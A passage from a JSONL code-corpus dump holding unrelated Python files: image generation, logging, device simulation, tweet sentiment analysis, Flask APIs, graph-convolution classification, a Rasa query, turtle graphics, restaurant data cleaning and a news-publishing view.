unittest.main()\n","sub_path":"python/algorithm/test/test_queue.py","file_name":"test_queue.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"228030417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRandom_art.py\n\n@author: amonmillner, adapted from pruvolo work\n\"\"\"\n\nimport random\nimport math\nimport Image\nim = Image.new(\"RGB\",(350,350))\n\n\ndef build_random_function(min_depth, max_depth):\n\t\"\"\"\n\t# choose one number between min_depth and max_depth 
randomly, make that depth of function composed of product, sin_pi, cos_pi randomly.\n\t# input : min_depth(integer), max_depth(integer)\n\t# output : random function(nested list)\n\t\"\"\"\n\tfunction = [] # put random functions in here\n\tdepth = random.randint(min_depth,max_depth)\n\tx = depth\n\t# functions are chosen in below two lists \n\tbuilding_block = [[\"prod\",'a','b'],[\"cos_pi\",'a'],[\"sin_pi\",'a']] \n\tsimple_block = [['x'],['y']] \n\n\tif x == 1:\n\t\ta = random.choice(simple_block) # depth = 1 so choose x or y\n\t\tfunction.append(a)\n\t\tx = x-1 # to return function when x=0\n\t\treturn a\n\t\t\n\tif x > 1:\n\t\ta = random.choice(building_block) # choose prod or sin or cos\n\t\tfunction.append(a)\n\t\tif a == building_block[0]: # if a = \"prod\"\n\t\t\ta[1] = build_random_function(x-1,x-1) # use recursion\n\t\t\ta[2] = build_random_function(x-1,x-1) # length of prod list is 3 so it needs 2 arguments\n\t\t\treturn a\n\t\telse: # if a = \"cos_pi\" or \"sin_pi\"\n\t\t\ta[1] = build_random_function(x-1,x-1) # use recursion / need only 1 argument\n\t\t\treturn a\n\n\tif x==0: # making random function finish so return function\n\t\treturn function\n\n\n\ndef evaluate_random_function(f,x,y):\n\t\"\"\"\n\t# calculate function f using argument x and y.\n\t# input : f (nested list), x(float), y(float)\n\t# output : calculated value (float)\n\t\"\"\"\n\tx1 = float(x)\n\ty1 = float(y)\n\ta = f \n\tif len(a)==3: # if a[0]=\"prod\"\n\t\tif len(a[1])>1: # if a[1] is nested list\n\t\t\tone = float(evaluate_random_function(a[1],x1,y1)) # use recursion\n\t\t\ttwo = float(evaluate_random_function(a[2],x1,y1))\n\t\t\treturn one*two \n\t\tif len(a[1])==1: # if a[1] is ['x'] or ['y']\n\t\t\tif a[1]==['x'] and a[2]==['x']:\n\t\t\t\treturn x1*x1\n\t\t\telif a[1]==['x'] and a[2]==['y']:\n\t\t\t\treturn x1*y1\n\t\t\telif a[1]==['y'] and a[2]==['x']:\n\t\t\t\treturn x1*y1\n\t\t\telse:\n\t\t\t\treturn y1*y1\n\n\tif len(a)==2: # if a[0] = \"sin_pi\" or \"cos_pi\"\n\t\tif len(a[1]) > 1: # if a[1] is nested list\n\t\t\tone = float(evaluate_random_function(a[1],x1,y1))\n\t\t\tif a[0]=='sin_pi':\n\t\t\t\treturn float(math.sin(math.pi*one))\n\t\t\telse:\n\t\t\t\treturn float(math.cos(math.pi*float(one)))\n\t\tif len(a[1])==1: # if a[1] is ['x'] or ['y']\n\t\t\tif a[0]=='sin_pi' and a[1]==['x']:\n\t\t\t\treturn float(math.sin(math.pi*x1))\n\t\t\telif a[0]=='sin_pi' and a[1]==['y']:\n\t\t\t\treturn float(math.sin(math.pi*y1))\n\t\t\telif a[0]=='cos_pi' and a[1]==['x']:\n\t\t\t\treturn float(math.cos(math.pi*x1))\n\t\t\telse:\n\t\t\t\treturn float(math.cos(math.pi*y1))\n\tif len(a)==1: # if a = ['x'] or ['y']\n\t\tif a[0]=='x':\n\t\t\treturn x1\n\t\telse:\n\t\t\treturn y1\n\n\ndef remap_interval(val,input_interval_start,input_interval_end,output_interval_start,output_interval_end):\n\t\"\"\"\n\t# maps the input value that is in the interval [input_interval_start, input_interval_end] to the counterpart in output interval [output_interval_start, output_interval_end].\n\t# input : val(number), input_interval_start(number), input_interval_end(number), output_interval_start(number), output_interval_end(number)\n\t# output : corresponding value of input value\n\t\"\"\"\n\ta = float(val)\n\tb = float(input_interval_start)\n\tc = float(input_interval_end)\n\td = float(output_interval_start)\n\te = float(output_interval_end)\n\t# (output_interval_end - output_interval_start) * (value - input_interval_start) / (input_interval_end - input_interval_start) + output_interval_start\n\t# shape of y = ax + b\n\tf = float((e - d) * (a - b) / (c - b) + d)\n\treturn f\n\n\n\n\ndef drawing(min_depth,max_depth,x,y):\n\t\"\"\"\n\t# make 3 random functions for red, green and blue, put x axis value and y axis value in each rgb function, put the result to corresponding point in image\n\t# input : min_depth(integer), max_depth(integer), x(number), y(number)\n\t# output : image with random rgb value in every pixel\n\t\"\"\"\n\tR_function = build_random_function(min_depth,max_depth)\n\tG_function = build_random_function(min_depth,max_depth)\n\tB_function = build_random_function(min_depth,max_depth)\n\tim = Image.new(\"RGB\",(x,y)) # make image with x*y size\n\n\tfor i in range(x):\n\t\tfor j in range(y): # for every point in the image\n\t\t\ta = remap_interval(i,0,x-1,-1,1) # if x=5 then interval is [0,4]\n\t\t\tb = remap_interval(j,0,y-1,-1,1)\n\t\t\tred_1 = evaluate_random_function(R_function,a,b) # value is between [-1,1]\n\t\t\tred_2 = int(remap_interval(red_1,-1,1,0,255)) # value is an integer between [0,255] which is for red in rgb\n\t\t\tgreen_1 = evaluate_random_function(G_function,a,b) # value is between [-1,1]\n\t\t\tgreen_2 = int(remap_interval(green_1,-1,1,0,255)) # value is an integer between [0,255] which is for green in rgb\n\t\t\tblue_1 = evaluate_random_function(B_function,a,b) # value is between [-1,1]\n\t\t\tblue_2 = int(remap_interval(blue_1,-1,1,0,255)) # value is an integer between [0,255] which is for blue in rgb\n\t\t\t\n\t\t\tim.putpixel((i,j),(red_2,green_2,blue_2)) # put rgb value in (i,j)\n\t\t\t\n\tim.save('soeun_pattern.png') # save image with name 'soeun_pattern'\n\ndrawing(4,15,350,350) # execute function\n","sub_path":"MP2/random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"581290134","text":"# -*- coding: UTF-8 -*-\n\nimport logging\n\n\ndef connectorLog():\n\n logger = logging.getLogger() # no name is passed, so this configures the root logger\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s: - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n # use a FileHandler to write the log to a file\n fh = logging.FileHandler('prm_core/iManageConnector/iManageConnector.log')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n","sub_path":"prm_core/iManageConnector/connectorLog.py","file_name":"connectorLog.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"390466429","text":"# Copyright 2013 DEVSIM LLC\n#\n# SPDX-License-Identifier: Apache-2.0\n\n# The purpose is to verify our triangle element field calculation.\n# It is based on Laux's weighting scheme\n#@article{Laux:1985,\n# author = {Laux, Steven E. and Byrnes, Robert G.},\n# title = {Semiconductor device simulation using generalized mobility models},\n# journal = {IBM J. Res. 
Dev.},\n# issue_date = {May 1985},\n# volume = {29},\n# number = {3},\n# month = may,\n# year = {1985},\n# issn = {0018-8646},\n# pages = {289--301},\n# numpages = {13},\n# url = {http://dx.doi.org/10.1147/rd.293.0289},\n# doi = {10.1147/rd.293.0289},\n# acmid = {1012099},\n# publisher = {IBM Corp.},\n# address = {Riverton, NJ, USA},\n#}\n\nimport sys\ntry:\n import numpy\n import numpy.linalg\nexcept:\n print(\"numpy is not available with your installation and is not being run\")\n sys.exit(-1)\n\n\nfrom devsim import *\nfrom laux_common import *\nimport laux_common\n\n\nload_devices(file=\"gmsh_diode3d_dd.msh\")\ndevice = \"diode3d\"\nregion = \"Bulk\"\n\nSetDimension(3)\nnee = laux_common.nee\nnen = laux_common.nen\ndim = laux_common.dim\n\n\n\n# There are nee edges per tetrahedron\n#number_elements = len(scalar_efield)/laux_common.nee;\n\n\nnumber_test = -1\n\nRunTest(device, region, number_test, \"ElectricField\", \"Potential\")\n\nimport devsim\ndevsim.set_parameter(name=\"V_t\", value=0.0259)\ndevsim.set_parameter(name=\"mu_n\", value=400)\ndevsim.set_parameter(name=\"ElectronCharge\", value=1.6e-19)\nRunTest(device, region, number_test, \"ElectronCurrent\", \"Potential\")\n\n\n","sub_path":"examples/diode/laux3d.py","file_name":"laux3d.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"464669730","text":"'''\nIn this project, you will visualize the feelings and language used in a set of\nTweets. This starter code loads the appropriate libraries and the Twitter data you'll\nneed!\n'''\n\nimport json\nfrom textblob import TextBlob\nimport matplotlib.pyplot as plt\n\n#Get the JSON data\ntweetFile = open(\"TwitterData/tweets_small.json\", \"r\")\ntweetData = json.load(tweetFile)\ntweetFile.close()\n\n# Continue your program below! 
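# (Illustrative sketch, not part of the original starter file: what TextBlob
# reports for a single string. It relies only on the TextBlob class imported
# above and the same `polarity` / `subjectivity` attributes the code below
# uses; the sample text and the values described are made up.)
#   tb = TextBlob("I love sunny days")
#   tb.polarity      # float in [-1.0, 1.0]; values above 0 read as positive sentiment
#   tb.subjectivity  # float in [0.0, 1.0]; values near 1 read as more subjective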
\ntweet_text = []\ntweetstring = \"\"\nfor tweet in tweetData:\n tweetstring += tweet['text']\n x = tweet['text']\n tweet_text.append(x)\n# print(tweetstring)\n\n# Textblob sample:\npolarity = []\nsubjectivity = []\n\n# print(tweet_text)\nfor tweet in tweet_text:\n tb = TextBlob(tweet)\n subjectivity.append(tb.subjectivity)\n polarity.append(tb.polarity)\ntweetBlob = TextBlob(tweetstring)\nword_dict = {}\nfor word in tweetBlob.words:\n word_dict[word.lower()] = tweetBlob.word_counts[word.lower()]\n print(word_dict)\n\n\n\n# print(subjectivity)\n# print(polarity)\n\n# y = sum(polarity)/len(polarity)\n# w = sum(subjectivity)/len(subjectivity)\n# print(y)\n# print(w)\n\n# import matplotlib.pyplot as plt\n\n# plt.hist(polarity, bins=[-1, -0.5, 0.0, 0.5, 1])\n# plt.hist(subjectivity, bins=[-1, -0.5, 0.0, 0.5, 1])\n# plt.xlabel('Values')\n# plt.ylabel('Number of Items')\n# plt.title('Histogram of Numbers')\n# plt.axis([-1.1, 1.1, 0, 100])\n# plt.grid(True)\n# plt.show()","sub_path":"U2-Applications/U2.1-Data/data_vis_project_starter.py","file_name":"data_vis_project_starter.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"532396899","text":"import collections\nimport sys\ninput = sys.stdin.readline\nimport heapq\nfrom array import array\ndef solve():\n n = int(input())\n\n query2 = collections.deque([])\n edge = [[] for _ in range(n)]\n ans = array('I', [ 0 for i in range(n)])\n for i in range(n-1):\n a,b = (int(i) for i in input().split())\n query2.append(a)\n query2.append(b)\n edge[a-1].append(b-1)\n edge[b-1].append(a-1)\n c = list(int(i) for i in input().split())\n if n == 1:\n print(1)\n print(c[0])\n exit()\n c = collections.deque(sorted(c,reverse =True))\n d = collections.Counter(query2)\n d2 = d.most_common()\n bfs = []\n heapq.heappush(bfs,(-1*d2[0][1],d2[0][0]-1,-1)) # (times, place, parent)\n ct = 0\n visit = [False]*n\n while bfs:\n times,place,parent = heapq.heappop(bfs)\n if visit[place]:\n continue\n else:\n visit[place] = True\n\n for i in range(len(edge[place])):\n newp = edge[place][i]\n newtimes = len(edge[newp])\n if not visit[newp]:\n heapq.heappush(bfs,(-1*newtimes,newp,place))\n #print(place,parent,times)\n ans[place] = c.popleft()\n\n #print(c,place)\n\n print(sum(ans)-max(ans))\n print(*ans)\n \nsolve()\n","sub_path":"Python_codes/p03026/s087459191.py","file_name":"s087459191.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"285738070","text":"from rest_framework import serializers\n\nfrom deeplobe_api.db.models import Task\n\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = Task\n fields = [\n \"id\",\n \"uuid\",\n \"weight_name\",\n \"task_type\",\n \"user\",\n \"task_finished\",\n \"data\",\n \"extra\"\n ]\n\n","sub_path":"deeplobe_api/api/serializers/task_serializer.py","file_name":"task_serializer.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"509382565","text":"from flask import request\nfrom flask_restful import Resource, reqparse, abort\n\nfrom flaskr import db\nfrom flaskr.models import Song\nfrom flaskr.utils import with_pagination\n\n\ndef init_resources(api):\n api.add_resource(SongListResource, '/songs')\n api.add_resource(SongListSearchResource, '/songs/search')\n api.add_resource(SongPollResource, '/songs/rating')\n 
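# (Illustrative commentary, not original code: the kinds of requests these
# registrations serve. The host and port are assumptions; the query and form
# field names come from the resource classes defined below.)
#   GET  http://localhost:5000/songs/search?message=love
#   POST http://localhost:5000/songs/rating   (form fields: song_id, rating in 1..5)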
api.add_resource(SongDifficultyStatResource, '/songs/avg/difficulty')\n api.add_resource(SongRatingStatResource, '/songs/avg/rating/<song_id>')\n\n\nclass SongListResource(Resource):\n @with_pagination\n def get(self, page=None, page_size=None):\n query = Song.query\n\n if page is not None:\n query = query.paginate(page, page_size).items\n\n return [song.to_json() for song in query]\n\n\nclass SongListSearchResource(Resource):\n @with_pagination\n def get(self, page=None, page_size=None):\n parser = reqparse.RequestParser()\n parser.add_argument('message', type=str, required=True)\n message = parser.parse_args()['message']\n\n query = Song.query.filter({'$text': {'$search': message}})\n\n if page is not None:\n query = query.paginate(page, page_size).items\n\n return [song.to_json() for song in query]\n\n\nclass SongPollResource(Resource):\n def post(self):\n song_id = request.form.get('song_id')\n rating_str = request.form.get('rating')\n\n if not rating_str or not rating_str.isdigit():\n abort(400)\n rating = int(rating_str)\n\n if not (1 <= rating <= 5):\n abort(400)\n\n song = Song.query.get_or_404(song_id)\n song.ratings.append(rating)\n song.save()\n return song.to_json()\n\n\nclass SongDifficultyStatResource(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('level', type=int)\n level = parser.parse_args().get('level')\n\n pipeline = []\n if level is not None:\n pipeline.append({'$match': {'level': level}})\n\n pipeline.append({\n '$group': {\n '_id': None,\n 'result': {'$avg': '$difficulty'}\n }\n })\n cursor = db.session.db.Song.aggregate(pipeline=pipeline, cursor={})\n\n for doc in cursor:\n return {'average_difficulty': doc['result']}\n else:\n return {'average_difficulty': None}\n\n\nclass SongRatingStatResource(Resource):\n def get(self, song_id):\n ratings = Song.query.get_or_404(song_id).ratings\n\n if not ratings:\n return {\n 'average': None,\n 'lowest': None,\n 'highest': None,\n }\n\n return {\n 'average': sum(ratings) / len(ratings),\n 'lowest': min(ratings),\n 'highest': max(ratings),\n }\n","sub_path":"flaskr/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"447863309","text":"import math\nimport time\nimport numpy as np\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport os\n\nimport pickle\nimport scipy.sparse as sp\nfrom sklearn.model_selection import cross_val_score, GridSearchCV, StratifiedKFold\nfrom skorch import NeuralNetClassifier\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\n\n\nX = pickle.load(open(\"X_tfidf_matrix.pkl\", \"rb\"))\ny_onehot = pickle.load(open(\"y_onehot.pkl\", \"rb\"))\ny = np.argmax(y_onehot, axis=1)\n\nX[:,:100]=pickle.load(open(\"../data/Bow.pkl\", \"rb\"))\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, 
sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\n\nadj = pickle.load(open(\"Adj_sparse.pkl\", \"rb\"))\n# build symmetric adjacency matrix\nadj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n# mytrick: add epsilon, \n#epsilon = 1\nadj = normalize(adj + sp.eye(adj.shape[0]))\n\n# 2 order develop of g * x\n#adj = normalize(adj c+ 0.001*sp.eye(adj.shape[0]))\n#adj = adj + 2*adj.dot(adj)\nadj = sparse_mx_to_torch_sparse_tensor(adj)\n\n\nX = normalize(X)\n\n\nclass GraphConvolution(Module):\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n\n support = torch.mm(input, self.weight)\n\n output = torch.spmm(adj, support)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nclass, adj, allfeatures, dropout = 0.0):\n super(GCN, self).__init__()\n self.adj = adj\n self.allfeatures = allfeatures\n self.gc1 = GraphConvolution(nfeat, int(nfeat/2))\n \n self.gc2 = GraphConvolution(int(nfeat/2), nclass)\n self.dropout = dropout\n\n def forward(self, idx):\n x = F.relu(self.gc1(self.allfeatures, self.adj))\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, self.adj)\n \n return x[idx.long()]\n\n\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=y.max()+1,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\n\nparams = {\n 'lr': [0.1,0.05,0.01, 0.005,0.001],\n 'max_epochs': [ 20, 25, 30,40,50,60],\n 'optimizer': [optim.Adam, optim.AdamW, optim.RMSprop]\n}\n\nK = 10\nskfold = StratifiedKFold(n_splits=K, shuffle=True, random_state=1234)\n\n\nprint(\"Parameter search:\")\ngs = GridSearchCV(net, params, cv=skfold, scoring=['f1_micro', 'f1_macro', \"accuracy\"], refit=\"f1_macro\")\ngs.fit(np.arange(0,len(X)), y)\n\nprint(\"Best parameters:\")\ngs.best_params_\n\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=y.max()+1,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n lr=gs.best_params_['lr'],\n max_epochs=gs.best_params_['max_epochs']+20,\n optimizer = gs.best_params_['optimizer'],\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\nf1macro = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='f1_macro', cv=skfold))\nnet.initialize()\nf1micro = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='f1_micro', cv=skfold))\nnet.initialize()\naccuracy = np.mean(cross_val_score(net, np.arange(len(X)), y, scoring='accuracy', cv=skfold))\n\nprint(\"Results with best parameters\")\nprint(\"F1 macro:{}\\nF1_micro:{}\\nAccuracy:{}\".format(f1macro, f1micro, 
accuracy))\n\n\n\nprint(\"OneVSRest Results with best parameters\")\nnet = NeuralNetClassifier(GCN,\n module__nfeat=X.shape[1],\n module__nclass=2,\n module__adj=adj,\n module__allfeatures=torch.FloatTensor(X),\n lr=gs.best_params_['lr'],\n max_epochs=gs.best_params_['max_epochs'],\n optimizer = gs.best_params_['optimizer'],\n criterion=nn.CrossEntropyLoss,\n iterator_train__shuffle=True,\n batch_size=-1\n )\n\n\nratio_matrix = np.zeros((y_onehot.shape[1], K, 2))\nf1_matrix = np.zeros((y_onehot.shape[1], K))\nprecision_matrix = np.zeros((y_onehot.shape[1], K))\nrecall_matrix = np.zeros((y_onehot.shape[1], K))\naccuracy_matrix = np.zeros((y_onehot.shape[1], K))\n\nfor k, idx in enumerate(skfold.split(X, y.reshape(-1))):\n idx_val, idx_train = idx\n for i in range(y.max()+1):\n y_prime = np.zeros(y.shape[0])\n y_prime[y==i] = 1\n y_prime = y_prime.astype(np.longlong)\n y_train, y_val = y_prime[idx_train], y_prime[idx_val]\n print(\"*** class {} fold {}\".format(i, k))\n ratio_matrix[i][k][0] = sum(y_train)/len(y_train)\n ratio_matrix[i][k][1] = sum(y_val)/len(y_val)\n net.initialize()\n y_pred = net.fit(idx_train,y_train).predict(idx_val)\n f1_matrix[i][k] = f1_score(y_val, y_pred)\n precision_matrix[i][k] = precision_score(y_val, y_pred)\n recall_matrix[i][k] = recall_score(y_val, y_pred)\n accuracy_matrix[i][k] = accuracy_score(y_val, y_pred)\n\n\n\nfor i in range(y.max()+1):\n for k in range(K):\n print(\"Class {} Fold {}: train ratio:{:.2f}% val ratio:{:.2f}%.\".format(i,k+1,ratio_matrix[i][k][0]*100,ratio_matrix[i][k][1]*100))\n\nprint(\"Result matrix:\\n i-th row and j-th column represents the corresponding result of i-th class and j-th split.\")\nprint(\"F1 score:\")\nprint(f1_matrix)\nprint(\"Precision score:\")\nprint(precision_matrix)\nprint(\"Recall score:\")\nprint(recall_matrix)\nprint(\"Accuracy score:\")\nprint(accuracy_matrix)\n\n","sub_path":"GCN/Classfication_GCN_bow.py","file_name":"Classfication_GCN_bow.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"437976913","text":"from pyadlml.dataset.representations.raw import create_raw\nfrom pyadlml.dataset.representations.changepoint import create_changepoint\nfrom pyadlml.dataset.devices import check_devices\nfrom pyadlml.dataset.activities import check_activities\n\nclass Data():\n def __init__(self, activities, devices):\n assert check_activities(activities) \n assert check_devices(devices)\n\n self.df_activities = activities\n self.df_devices = devices\n\n # list of activities and devices\n self.activities = list(activities.activity.unique())\n self.devices = list(devices.device.unique())\n self.df_raw = None\n self.df_cp = None\n self.df_lf = None\n\n def create_cp(self, t_res):\n raise NotImplementedError\n\n def create_raw(self, t_res=None, idle=False):\n self.df_raw = create_raw(self.df_devices, self.df_activities, t_res)\n\n def create_lastfired(self):\n raise NotImplementedError","sub_path":"pyadlml/dataset/obj.py","file_name":"obj.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"460049573","text":"from rasa.core.agent import Agent\nfrom rasa.core.interpreter import RasaNLUInterpreter\nimport asyncio\n\nagent = Agent.load(\"/Users/lidayuan/Documents/edison/nlu/rasa/examples/rasasc/models/20190916-144136\")\n\n\nasync def get_answer():\n data = await agent.handle_text(\"What is Edison Privacy Policy for the Email 
app?\")\n print(data)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(get_answer())\n loop.close()\n","sub_path":"examples/rasasc/model_test_by_agent.py","file_name":"model_test_by_agent.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158341340","text":"import turtle\r\nturtle.width(1)\r\nturtle.bgcolor(\"black\")\r\ncolors=[\"red\",\"yellow\",\"blue\",\"green\",\"orange\",\"purple\"]\r\nturtle.tracer(False)\r\nfor x in range(182):\r\n turtle.forward(2*x)\r\n turtle.color(colors[x%6])\r\n turtle.left(-299)\r\n turtle.width(x*6/210)\r\nturtle.tracer(True)\r\nturtle.done()\r\n","sub_path":"旋转图案.py","file_name":"旋转图案.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"580598240","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 11 15:36:20 2018\n\n@author: wcd\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport warnings \nwarnings.filterwarnings('ignore')\n\nfrom bokeh.plotting import figure,show,output_file\nfrom bokeh.models import ColumnDataSource\n\nprint('finished')\n\nimport os\nos.chdir('C:\\\\Users\\\\wcd\\\\Desktop\\\\')\n\ndef1=pd.read_excel('上海餐饮数据.xlsx',sheetname=0)\n\n# calculations\n\ndata1=def1[['类别','口味','环境','服务','人均消费']]\n\ndata1.dropna(inplace=True)\ndata1=data1[(data1['口味']>0)& (data1['人均消费']>0)]\ndata1['性价比']=(data1['口味']+data1['环境']+data1['服务'])/data1['人均消费']\n# clean the data\n\ndef f1():\n # fig,axes=plt.subplots(1,3,figsize(10,4))\n fig,axes = plt.subplots(1,3,figsize = (10,4))\n data1.boxplot(column=['口味'],ax=axes[0])\n data1.boxplot(column=['人均消费'],ax=axes[1])\n data1.boxplot(column=['性价比'],ax=axes[2])\n \n \n \n \ndef f2(data,col):\n q1=data[col].quantile(q=0.25)\n q3=data[col].quantile(q=0.75)\n iqr=q3-q1\n t1=q1-3*iqr\n t2=q3+3*iqr\n return data[(data[col]>t1)&(data[col] 0\n\ndef softmax(Z):\n A = np.exp(Z) / sum(np.exp(Z))\n return A\n\ndef predict(X,index, Theta1, bias1, Theta2, bias2):\n image = X[:, index, None]\n\n _, _, _, A2 = nn.forward_prop(Theta1, bias1, Theta2, bias2, X)\n predictions = np.argmax(A2,0)\n\n print(\"Prediction: \", predictions[index])\n image = image.reshape((28, 28)) * 255\n plt.gray()\n plt.imshow(image, interpolation='nearest')\n plt.show()","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"330030923","text":"from flask import g, request, jsonify, current_app, session\nfrom info import db, constants\nfrom info.constants import QINIU_DOMIN_PREFIX\nfrom info.models import Category, News\nfrom info.utils.pic_storage import pic_storage\nfrom info.utils.response_code import RET\nfrom . 
import profile_bp\nfrom flask import render_template\nfrom info.utils.common import user_login_data\n\n\n@profile_bp.route('/user_follow')\n@user_login_data\ndef user_follow():\n # 获取页数\n p = request.args.get(\"p\", 1)\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n p = 1\n\n user = g.user\n\n follows = []\n current_page = 1\n total_page = 1\n try:\n # user.followed当前登录用户的关注列表\n paginate = user.followed.paginate(p, constants.USER_FOLLOWED_MAX_COUNT, False)\n # 获取当前页数据\n follows = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n user_dict_li = []\n\n for follow_user in follows:\n user_dict_li.append(follow_user.to_dict())\n data = {\"users\": user_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template('profile/user_follow.html', data=data)\n\n\n@profile_bp.route('/news_release', methods=['GET', 'POST'])\n@user_login_data\ndef news_release():\n \"\"\"用户发表新闻的接口\"\"\"\n if request.method == \"GET\":\n # 查询所有分类数据\n try:\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '新闻类别查询错误'})\n\n # 对象列表转字典列表\n category_dict = []\n for category in categories:\n category_dict.append(category.to_dict())\n\n # 移处 最新 分类\n category_dict.pop(0)\n\n # 组织响应数据\n data = {\n \"categories\":category_dict\n }\n return render_template(\"profile/user_news_release.html\",data = data)\n\n \"\"\"\n 如果是post请求:发布新闻\n 1.获取参数\n 1.1 title:新闻标题 category_id:新闻分类ID source:新闻来源(默认个人发布)\n digest:新闻摘要 index_image:索引图片 content:新闻\n 2.1 当前用户\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 将新闻主图上传到七牛云\n 3.2 创建新闻对象,并赋值属性\n 3.3 保存到数据库\n 4.返回值\n \"\"\"\n\n # 1.1 获取参数\n param_dict = request.form\n\n title = param_dict.get(\"title\")\n category_id = param_dict.get(\"category_id\")\n digest = param_dict.get(\"digest\")\n content = param_dict.get(\"content\")\n source = \"个人发布\"\n\n index_image = request.files.get(\"index_image\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([title,category_id,digest,content,index_image]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n\n try:\n pic_data = index_image.read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '图片获取失败'})\n\n # 3.1 将新闻主图上传到七牛云\n try:\n key = pic_storage(pic_data)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '上传图片到七牛云失败'})\n\n # 3.2 创建新闻对象,并赋值属性\n news = News()\n news.title = title\n news.category_id = 